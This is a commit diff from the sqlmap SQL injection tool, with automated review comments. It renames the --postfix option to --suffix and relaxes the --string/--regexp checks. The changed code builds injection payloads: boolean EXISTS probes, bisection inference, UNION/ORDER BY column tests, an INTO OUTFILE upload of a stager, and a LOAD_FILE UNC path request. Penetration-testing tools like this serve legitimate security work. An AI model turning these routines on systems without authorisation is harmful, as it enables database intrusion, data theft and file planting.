Proper English (--postfix is now --suffix), and --string/--regexp do not necessarily need to match the original response body; they might well be in the injected True condition only!
This commit is contained in:
parent
ca5125bbe0
commit
17486e472a
|
@ -213,7 +213,7 @@ Gabriel Lima <pato@bugnet.com.br>
|
||||||
for reporting a couple of bugs
|
for reporting a couple of bugs
|
||||||
|
|
||||||
Mark Lowe <larkmowe@gmail.com>
|
Mark Lowe <larkmowe@gmail.com>
|
||||||
for reporting a bug
|
for reporting a couple of bugs
|
||||||
|
|
||||||
Truong Duc Luong <luongductruong@gmail.com>
|
Truong Duc Luong <luongductruong@gmail.com>
|
||||||
for reporting a minor bug
|
for reporting a minor bug
|
||||||
|
|
|
@ -52,15 +52,15 @@ def checkSqlInjection(place, parameter, value, parenthesis):
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
randStr = randomStr()
|
randStr = randomStr()
|
||||||
prefix = ""
|
prefix = ""
|
||||||
postfix = ""
|
suffix = ""
|
||||||
retVal = None
|
retVal = None
|
||||||
|
|
||||||
if conf.prefix or conf.postfix:
|
if conf.prefix or conf.suffix:
|
||||||
if conf.prefix:
|
if conf.prefix:
|
||||||
prefix = conf.prefix
|
prefix = conf.prefix
|
||||||
|
|
||||||
if conf.postfix:
|
if conf.suffix:
|
||||||
postfix = conf.postfix
|
suffix = conf.suffix
|
||||||
|
|
||||||
for case in kb.injections.root.case:
|
for case in kb.injections.root.case:
|
||||||
conf.matchRatio = None
|
conf.matchRatio = None
|
||||||
|
@ -68,7 +68,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
|
||||||
positive = case.test.positive
|
positive = case.test.positive
|
||||||
negative = case.test.negative
|
negative = case.test.negative
|
||||||
|
|
||||||
if not prefix and not postfix and case.name == "custom":
|
if not prefix and not suffix and case.name == "custom":
|
||||||
continue
|
continue
|
||||||
|
|
||||||
infoMsg = "testing %s (%s) injection " % (case.desc, logic)
|
infoMsg = "testing %s (%s) injection " % (case.desc, logic)
|
||||||
|
@ -116,16 +116,16 @@ def heuristicCheckSqlInjection(place, parameter, value):
|
||||||
return
|
return
|
||||||
|
|
||||||
prefix = ""
|
prefix = ""
|
||||||
postfix = ""
|
suffix = ""
|
||||||
|
|
||||||
if conf.prefix or conf.postfix:
|
if conf.prefix or conf.suffix:
|
||||||
if conf.prefix:
|
if conf.prefix:
|
||||||
prefix = conf.prefix
|
prefix = conf.prefix
|
||||||
|
|
||||||
if conf.postfix:
|
if conf.suffix:
|
||||||
postfix = conf.postfix
|
suffix = conf.suffix
|
||||||
|
|
||||||
payload = "%s%s%s%s" % (value, prefix, randomStr(length=10, alphabet=['"', '\'', ')', '(']), postfix)
|
payload = "%s%s%s%s" % (value, prefix, randomStr(length=10, alphabet=['"', '\'', ')', '(']), suffix)
|
||||||
payload = agent.payload(place, parameter, value, payload)
|
payload = agent.payload(place, parameter, value, payload)
|
||||||
Request.queryPage(payload, place, raise404=False)
|
Request.queryPage(payload, place, raise404=False)
|
||||||
result = wasLastRequestDBMSError()
|
result = wasLastRequestDBMSError()
|
||||||
|
@ -209,15 +209,15 @@ def checkDynamicContent(firstPage, secondPage):
|
||||||
|
|
||||||
for i in xrange(len(blocks) - 1):
|
for i in xrange(len(blocks) - 1):
|
||||||
prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None
|
prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None
|
||||||
postfix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None
|
suffix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None
|
||||||
|
|
||||||
if prefix is None and blocks[i + 1][0] == 0:
|
if prefix is None and blocks[i + 1][0] == 0:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if postfix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)):
|
if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)):
|
||||||
continue
|
continue
|
||||||
|
|
||||||
kb.dynamicMarkings.append((re.escape(prefix[-conf.dynMarkLength:]) if prefix else None, re.escape(postfix[:conf.dynMarkLength]) if postfix else None))
|
kb.dynamicMarkings.append((re.escape(prefix[-conf.dynMarkLength:]) if prefix else None, re.escape(suffix[:conf.dynMarkLength]) if suffix else None))
|
||||||
|
|
||||||
if len(kb.dynamicMarkings) > 0:
|
if len(kb.dynamicMarkings) > 0:
|
||||||
infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '')
|
infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '')
|
||||||
|
@ -225,14 +225,14 @@ def checkDynamicContent(firstPage, secondPage):
|
||||||
|
|
||||||
if conf.seqMatcher.a:
|
if conf.seqMatcher.a:
|
||||||
for item in kb.dynamicMarkings:
|
for item in kb.dynamicMarkings:
|
||||||
prefix, postfix = item
|
prefix, suffix = item
|
||||||
|
|
||||||
if prefix is None:
|
if prefix is None:
|
||||||
conf.seqMatcher.a = re.sub('(?s)^.+%s' % postfix, postfix, conf.seqMatcher.a)
|
conf.seqMatcher.a = re.sub('(?s)^.+%s' % suffix, suffix, conf.seqMatcher.a)
|
||||||
elif postfix is None:
|
elif suffix is None:
|
||||||
conf.seqMatcher.a = re.sub('(?s)%s.+$' % prefix, prefix, conf.seqMatcher.a)
|
conf.seqMatcher.a = re.sub('(?s)%s.+$' % prefix, prefix, conf.seqMatcher.a)
|
||||||
else:
|
else:
|
||||||
conf.seqMatcher.a = re.sub('(?s)%s.+%s' % (prefix, postfix), '%s%s' % (prefix, postfix), conf.seqMatcher.a)
|
conf.seqMatcher.a = re.sub('(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), conf.seqMatcher.a)
|
||||||
|
|
||||||
def checkStability():
|
def checkStability():
|
||||||
"""
|
"""
|
||||||
|
@ -347,14 +347,14 @@ def checkString():
|
||||||
|
|
||||||
if conf.string in page:
|
if conf.string in page:
|
||||||
setString()
|
setString()
|
||||||
return True
|
|
||||||
else:
|
else:
|
||||||
errMsg = "you provided '%s' as the string to " % conf.string
|
warnMsg = "you provided '%s' as the string to " % conf.string
|
||||||
errMsg += "match, but such a string is not within the target "
|
warnMsg += "match, but such a string is not within the target "
|
||||||
errMsg += "URL page content, please provide another string."
|
warnMsg += "URL page content original request, sqlmap will "
|
||||||
logger.error(errMsg)
|
warnMsg += "keep going anyway"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
return False
|
return True
|
||||||
|
|
||||||
def checkRegexp():
|
def checkRegexp():
|
||||||
if not conf.regexp:
|
if not conf.regexp:
|
||||||
|
@ -377,15 +377,14 @@ def checkRegexp():
|
||||||
|
|
||||||
if re.search(conf.regexp, page, re.I | re.M):
|
if re.search(conf.regexp, page, re.I | re.M):
|
||||||
setRegexp()
|
setRegexp()
|
||||||
return True
|
|
||||||
else:
|
else:
|
||||||
errMsg = "you provided '%s' as the regular expression to " % conf.regexp
|
warnMsg = "you provided '%s' as the regular expression to " % conf.regexp
|
||||||
errMsg += "match, but such a regular expression does not have any "
|
warnMsg += "match, but such a regular expression does not have any "
|
||||||
errMsg += "match within the target URL page content, please provide "
|
warnMsg += "match within the target URL page content, sqlmap "
|
||||||
errMsg += "another regular expression."
|
warnMsg += "will keep going anyway"
|
||||||
logger.error(errMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
return False
|
return True
|
||||||
|
|
||||||
def checkNullConnection():
|
def checkNullConnection():
|
||||||
"""
|
"""
|
||||||
|
|
|
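Review bot: checkString and checkRegexp now return True on both branches (the `return True` inside the `if` was dropped and the trailing `return False` became `return True`), so the return value no longer tells a caller whether the match was found; any caller that still branches on a False result has a dead branch now, so either the callers should be checked or the outcome kept available, e.g. `return conf.string in page` in checkString and the equivalent `re.search` result in checkRegexp, with the warning logged beforehand. The new warning text in checkString is ungrammatical at `"URL page content original request, sqlmap will "`; `"URL page content of the original request, sqlmap will "` reads correctly. In checkRegexp the user-supplied pattern is still passed straight to `re.search` with no `except re.error`, so a malformed --regexp raises there instead of reaching the new warning; that predates this change but the relaxed semantics make a graceful warning more appropriate. Both functions start outside the hunks shown.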
@ -120,7 +120,7 @@ class Agent:
|
||||||
return self.payloadDirect(query)
|
return self.payloadDirect(query)
|
||||||
|
|
||||||
query = self.prefixQuery(query)
|
query = self.prefixQuery(query)
|
||||||
query = self.postfixQuery(query)
|
query = self.suffixQuery(query)
|
||||||
payload = self.payload(newValue=query)
|
payload = self.payload(newValue=query)
|
||||||
|
|
||||||
return payload
|
return payload
|
||||||
|
@ -156,7 +156,7 @@ class Agent:
|
||||||
|
|
||||||
return query
|
return query
|
||||||
|
|
||||||
def postfixQuery(self, string, comment=None):
|
def suffixQuery(self, string, comment=None):
|
||||||
"""
|
"""
|
||||||
This method appends the DBMS comment to the
|
This method appends the DBMS comment to the
|
||||||
SQL injection request
|
SQL injection request
|
||||||
|
@ -182,10 +182,10 @@ class Agent:
|
||||||
if comment:
|
if comment:
|
||||||
string += comment
|
string += comment
|
||||||
|
|
||||||
if conf.postfix:
|
if conf.suffix:
|
||||||
string += " %s" % conf.postfix
|
string += " %s" % conf.suffix
|
||||||
else:
|
else:
|
||||||
string += case.usage.postfix.format % eval(case.usage.postfix.params)
|
string += case.usage.suffix.format % eval(case.usage.suffix.params)
|
||||||
|
|
||||||
return string
|
return string
|
||||||
|
|
||||||
|
@ -499,7 +499,7 @@ class Agent:
|
||||||
if intoRegExp:
|
if intoRegExp:
|
||||||
inbandQuery += intoRegExp
|
inbandQuery += intoRegExp
|
||||||
|
|
||||||
inbandQuery = self.postfixQuery(inbandQuery, kb.unionComment)
|
inbandQuery = self.suffixQuery(inbandQuery, kb.unionComment)
|
||||||
|
|
||||||
return inbandQuery
|
return inbandQuery
|
||||||
|
|
||||||
|
@ -636,7 +636,7 @@ class Agent:
|
||||||
regObj = getCompiledRegex("(?P<result>%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER))
|
regObj = getCompiledRegex("(?P<result>%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER))
|
||||||
|
|
||||||
for match in regObj.finditer(inpStr):
|
for match in regObj.finditer(inpStr):
|
||||||
retVal = retVal.replace(match.group("result"), urlencode(match.group("result").strip(PAYLOAD_DELIMITER), convall=True))
|
retVal = retVal.replace(match.group("result"), match.group("result").strip(PAYLOAD_DELIMITER))
|
||||||
else:
|
else:
|
||||||
retVal = retVal.replace(PAYLOAD_DELIMITER, '')
|
retVal = retVal.replace(PAYLOAD_DELIMITER, '')
|
||||||
|
|
||||||
|
|
|
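Review bot: The hunk at `@ -636` replaces `urlencode(match.group("result").strip(PAYLOAD_DELIMITER), convall=True)` with the bare stripped payload, so the text between payload delimiters is no longer URL-encoded at this point; that is a behaviour change unrelated to the rename and to the --string/--regexp relaxation in the commit title, and nothing in the diff says why. It should either be its own commit with a message explaining the change, or carry a comment on that line stating that the delimited payload is deliberately left unencoded here and where (if anywhere) encoding now happens. The renamed suffixQuery keeps a docstring that only mentions appending the DBMS comment, while the body also appends `conf.suffix` or the case's usage suffix; `"""Append the DBMS comment and the configured (or case-defined) suffix to the SQL injection request."""` would describe what it does. The `eval(case.usage.suffix.params)` line evaluates text taken from the bundled injection-cases XML, which is acceptable only while that file stays under the project's control; a one-line comment recording that assumption would help the next reader. The enclosing methods start and end outside the hunks shown.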
@ -58,7 +58,7 @@ optDict = {
|
||||||
"dbms": "string",
|
"dbms": "string",
|
||||||
"os": "string",
|
"os": "string",
|
||||||
"prefix": "string",
|
"prefix": "string",
|
||||||
"postfix": "string",
|
"suffix": "string",
|
||||||
"tamper": "string"
|
"tamper": "string"
|
||||||
},
|
},
|
||||||
|
|
||||||
|
|
|
@ -169,8 +169,8 @@ def cmdLineParser():
|
||||||
injection.add_option("--prefix", dest="prefix",
|
injection.add_option("--prefix", dest="prefix",
|
||||||
help="Injection payload prefix string")
|
help="Injection payload prefix string")
|
||||||
|
|
||||||
injection.add_option("--postfix", dest="postfix",
|
injection.add_option("--suffix", dest="suffix",
|
||||||
help="Injection payload postfix string")
|
help="Injection payload suffix string")
|
||||||
|
|
||||||
injection.add_option("--tamper", dest="tamper",
|
injection.add_option("--tamper", dest="tamper",
|
||||||
help="Use given script(s) for tampering injection data")
|
help="Use given script(s) for tampering injection data")
|
||||||
|
|
|
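Review bot: Dropping `--postfix` outright means existing command lines and scripts now fail with an unknown-option error and there is no alias; keeping a hidden compatibility option, `injection.add_option("--postfix", dest="suffix", help=SUPPRESS_HELP)` (SUPPRESS_HELP from optparse), would make the rename painless for a release or two. The same applies to the configuration file, where the `postfix =` key is renamed to `suffix =`: an old file that still sets `postfix` will be silently ignored rather than rejected, so a deprecation warning or alias there too would help. cmdLineParser starts and ends outside this hunk.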
@ -60,14 +60,14 @@ def comparison(page, headers=None, getSeqMatcher=False, pageLength=None):
|
||||||
# Dynamic content lines to be excluded before comparison
|
# Dynamic content lines to be excluded before comparison
|
||||||
if not kb.nullConnection and not conf.longestCommon:
|
if not kb.nullConnection and not conf.longestCommon:
|
||||||
for item in kb.dynamicMarkings:
|
for item in kb.dynamicMarkings:
|
||||||
prefix, postfix = item
|
prefix, suffix = item
|
||||||
|
|
||||||
if prefix is None:
|
if prefix is None:
|
||||||
page = re.sub('(?s)^.+%s' % postfix, postfix, page)
|
page = re.sub('(?s)^.+%s' % suffix, suffix, page)
|
||||||
elif postfix is None:
|
elif suffix is None:
|
||||||
page = re.sub('(?s)%s.+$' % prefix, prefix, page)
|
page = re.sub('(?s)%s.+$' % prefix, prefix, page)
|
||||||
else:
|
else:
|
||||||
page = re.sub('(?s)%s.+%s' % (prefix, postfix), '%s%s' % (prefix, postfix), page)
|
page = re.sub('(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), page)
|
||||||
|
|
||||||
if not pageLength:
|
if not pageLength:
|
||||||
pageLength = len(page)
|
pageLength = len(page)
|
||||||
|
|
|
@ -99,7 +99,7 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
|
||||||
"""
|
"""
|
||||||
|
|
||||||
query = agent.prefixQuery(queries[kb.misc.testedDbms].inference.query)
|
query = agent.prefixQuery(queries[kb.misc.testedDbms].inference.query)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
count = None
|
count = None
|
||||||
startLimit = 0
|
startLimit = 0
|
||||||
|
@ -398,7 +398,7 @@ def goStacked(expression, silent=False):
|
||||||
|
|
||||||
comment = queries[kb.dbms].comment.query
|
comment = queries[kb.dbms].comment.query
|
||||||
query = agent.prefixQuery("; %s" % expression)
|
query = agent.prefixQuery("; %s" % expression)
|
||||||
query = agent.postfixQuery("%s;%s" % (query, comment))
|
query = agent.suffixQuery("%s;%s" % (query, comment))
|
||||||
|
|
||||||
debugMsg = "query: %s" % query
|
debugMsg = "query: %s" % query
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
|
@ -99,7 +99,7 @@ class Web:
|
||||||
query = "LIMIT 1 INTO OUTFILE '%s' " % outFile
|
query = "LIMIT 1 INTO OUTFILE '%s' " % outFile
|
||||||
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
|
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
|
||||||
query = agent.prefixQuery(query)
|
query = agent.prefixQuery(query)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
page = Request.queryPage(payload)
|
page = Request.queryPage(payload)
|
||||||
return page
|
return page
|
||||||
|
|
|
@ -442,7 +442,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||||
# One-shot query containing equals commonValue
|
# One-shot query containing equals commonValue
|
||||||
testValue = unescaper.unescape("'%s'" % commonValue) if "'" not in commonValue else unescaper.unescape("%s" % commonValue, quote=False)
|
testValue = unescaper.unescape("'%s'" % commonValue) if "'" not in commonValue else unescaper.unescape("%s" % commonValue, quote=False)
|
||||||
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
|
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
queriesCount[0] += 1
|
queriesCount[0] += 1
|
||||||
result = Request.queryPage(agent.payload(newValue=query))
|
result = Request.queryPage(agent.payload(newValue=query))
|
||||||
|
|
||||||
|
@ -466,7 +466,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||||
subquery = queries[kb.dbms].substring.query % (expressionUnescaped, 1, len(commonPattern))
|
subquery = queries[kb.dbms].substring.query % (expressionUnescaped, 1, len(commonPattern))
|
||||||
testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False)
|
testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False)
|
||||||
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
|
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
queriesCount[0] += 1
|
queriesCount[0] += 1
|
||||||
result = Request.queryPage(agent.payload(newValue=query))
|
result = Request.queryPage(agent.payload(newValue=query))
|
||||||
|
|
||||||
|
|
|
@ -28,7 +28,7 @@ def timeTest():
|
||||||
|
|
||||||
timeQuery = getDelayQuery(andCond=True)
|
timeQuery = getDelayQuery(andCond=True)
|
||||||
query = agent.prefixQuery("AND %s" % timeQuery)
|
query = agent.prefixQuery("AND %s" % timeQuery)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
start = time.time()
|
start = time.time()
|
||||||
_ = Request.queryPage(payload)
|
_ = Request.queryPage(payload)
|
||||||
|
|
|
@ -38,7 +38,7 @@ def tableExists(tableFile):
|
||||||
if conf.db and '(*)' not in conf.db:
|
if conf.db and '(*)' not in conf.db:
|
||||||
table = "%s.%s" % (conf.db, table)
|
table = "%s.%s" % (conf.db, table)
|
||||||
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %d FROM %s)", (randomInt(1), table)))
|
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %d FROM %s)", (randomInt(1), table)))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
result = Request.queryPage(agent.payload(newValue=query))
|
result = Request.queryPage(agent.payload(newValue=query))
|
||||||
|
|
||||||
if result:
|
if result:
|
||||||
|
@ -89,7 +89,7 @@ def columnExists(columnFile):
|
||||||
|
|
||||||
for column in columns:
|
for column in columns:
|
||||||
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %s FROM %s)", (column, table)))
|
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %s FROM %s)", (column, table)))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
result = Request.queryPage(agent.payload(newValue=query))
|
result = Request.queryPage(agent.payload(newValue=query))
|
||||||
|
|
||||||
if result:
|
if result:
|
||||||
|
@ -114,7 +114,7 @@ def columnExists(columnFile):
|
||||||
|
|
||||||
for column in retVal:
|
for column in retVal:
|
||||||
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %s FROM %s WHERE %s>0)", (column, table, column)))
|
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %s FROM %s WHERE %s>0)", (column, table, column)))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
result = Request.queryPage(agent.payload(newValue=query))
|
result = Request.queryPage(agent.payload(newValue=query))
|
||||||
|
|
||||||
if result:
|
if result:
|
||||||
|
|
|
@ -40,7 +40,7 @@ def errorUse(expression, returnPayload=False):
|
||||||
logic = conf.logic
|
logic = conf.logic
|
||||||
randInt = randomInt(1)
|
randInt = randomInt(1)
|
||||||
query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query)
|
query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
startLimiter = ""
|
startLimiter = ""
|
||||||
endLimiter = ""
|
endLimiter = ""
|
||||||
|
|
||||||
|
|
|
@ -128,7 +128,7 @@ def __unionTestByNULLBruteforce(comment, negative=False, falseCond=False):
|
||||||
if kb.dbms == DBMS.ORACLE:
|
if kb.dbms == DBMS.ORACLE:
|
||||||
query += " FROM DUAL"
|
query += " FROM DUAL"
|
||||||
|
|
||||||
commentedQuery = agent.postfixQuery(query, comment)
|
commentedQuery = agent.suffixQuery(query, comment)
|
||||||
payload = agent.payload(newValue=commentedQuery, negative=negative, falseCond=falseCond)
|
payload = agent.payload(newValue=commentedQuery, negative=negative, falseCond=falseCond)
|
||||||
test, seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
|
test, seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
|
||||||
|
|
||||||
|
@ -145,7 +145,7 @@ def __unionTestByOrderBy(comment, negative=False, falseCond=False):
|
||||||
|
|
||||||
for count in range(1, conf.uCols+2):
|
for count in range(1, conf.uCols+2):
|
||||||
query = agent.prefixQuery("ORDER BY %d" % count)
|
query = agent.prefixQuery("ORDER BY %d" % count)
|
||||||
orderByQuery = agent.postfixQuery(query, comment)
|
orderByQuery = agent.suffixQuery(query, comment)
|
||||||
payload = agent.payload(newValue=orderByQuery, negative=negative, falseCond=falseCond)
|
payload = agent.payload(newValue=orderByQuery, negative=negative, falseCond=falseCond)
|
||||||
_, seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
|
_, seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
|
||||||
|
|
||||||
|
|
|
@ -37,7 +37,7 @@ def checkForParenthesis():
|
||||||
if kb.parenthesis is not None:
|
if kb.parenthesis is not None:
|
||||||
return
|
return
|
||||||
|
|
||||||
if conf.prefix or conf.postfix:
|
if conf.prefix or conf.suffix:
|
||||||
kb.parenthesis = 0
|
kb.parenthesis = 0
|
||||||
return
|
return
|
||||||
|
|
||||||
|
@ -46,7 +46,7 @@ def checkForParenthesis():
|
||||||
randStr = randomStr()
|
randStr = randomStr()
|
||||||
|
|
||||||
query = case.usage.prefix.format % eval(case.usage.prefix.params)
|
query = case.usage.prefix.format % eval(case.usage.prefix.params)
|
||||||
query = query[:-1] + case.usage.postfix.format % eval(case.usage.postfix.params)
|
query = query[:-1] + case.usage.suffix.format % eval(case.usage.suffix.params)
|
||||||
|
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
|
|
|
@ -41,7 +41,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
table = "MSysAccessStorage"
|
table = "MSysAccessStorage"
|
||||||
if table:
|
if table:
|
||||||
query = agent.prefixQuery("AND EXISTS(SELECT CURDIR() FROM %s)" % table)
|
query = agent.prefixQuery("AND EXISTS(SELECT CURDIR() FROM %s)" % table)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
retVal = "not sandboxed" if result else "sandboxed"
|
retVal = "not sandboxed" if result else "sandboxed"
|
||||||
|
@ -71,7 +71,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
table = table[1:]
|
table = table[1:]
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt))
|
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
if result is None:
|
if result is None:
|
||||||
|
@ -95,7 +95,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
randStr = randomStr()
|
randStr = randomStr()
|
||||||
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
|
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
page = Request.queryPage(payload, content=True)
|
page = Request.queryPage(payload, content=True)
|
||||||
|
|
||||||
|
|
|
@ -35,7 +35,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
query = agent.prefixQuery("/* NoValue */")
|
query = agent.prefixQuery("/* NoValue */")
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
|
|
||||||
|
@ -49,7 +49,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
|
|
||||||
for version in [6, 7]:
|
for version in [6, 7]:
|
||||||
query = agent.prefixQuery("AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version)
|
query = agent.prefixQuery("AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
|
|
||||||
|
@ -58,7 +58,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
|
|
||||||
for version in xrange(0, 10):
|
for version in xrange(0, 10):
|
||||||
query = agent.prefixQuery("AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version)
|
query = agent.prefixQuery("AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
|
|
||||||
|
|
|
@ -36,7 +36,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
query = agent.prefixQuery("/* NoValue */")
|
query = agent.prefixQuery("/* NoValue */")
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
|
|
||||||
|
@ -66,7 +66,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
version = getUnicode(version)
|
version = getUnicode(version)
|
||||||
query = agent.prefixQuery("/*!%s AND %d=%d*/" % (version, randInt, randInt + 1))
|
query = agent.prefixQuery("/*!%s AND %d=%d*/" % (version, randInt, randInt + 1))
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
|
|
||||||
|
|
|
@ -102,7 +102,7 @@ class Takeover(GenericTakeover):
|
||||||
def uncPathRequest(self):
|
def uncPathRequest(self):
|
||||||
if not kb.stackedTest:
|
if not kb.stackedTest:
|
||||||
query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath)
|
query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath)
|
||||||
query = agent.postfixQuery(query)
|
query = agent.suffixQuery(query)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
|
|
||||||
Request.queryPage(payload)
|
Request.queryPage(payload)
|
||||||
|
|
|
@ -181,8 +181,8 @@ os =
|
||||||
# Injection payload prefix string
|
# Injection payload prefix string
|
||||||
prefix =
|
prefix =
|
||||||
|
|
||||||
# Injection payload postfix string
|
# Injection payload suffix string
|
||||||
postfix =
|
suffix =
|
||||||
|
|
||||||
# Use given script(s) for tampering injection data
|
# Use given script(s) for tampering injection data
|
||||||
tamper =
|
tamper =
|
||||||
|
|
|
@ -3,12 +3,12 @@
|
||||||
<root>
|
<root>
|
||||||
<case name="custom" desc="custom">
|
<case name="custom" desc="custom">
|
||||||
<test>
|
<test>
|
||||||
<positive format="%s%s%s %s %s%d=%d %s" params="value, prefix, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt, postfix"/>
|
<positive format="%s%s%s %s %s%d=%d %s" params="value, prefix, ")" * parenthesis, logic, "(" * parenthesis, randInt, randInt, suffix"/>
|
||||||
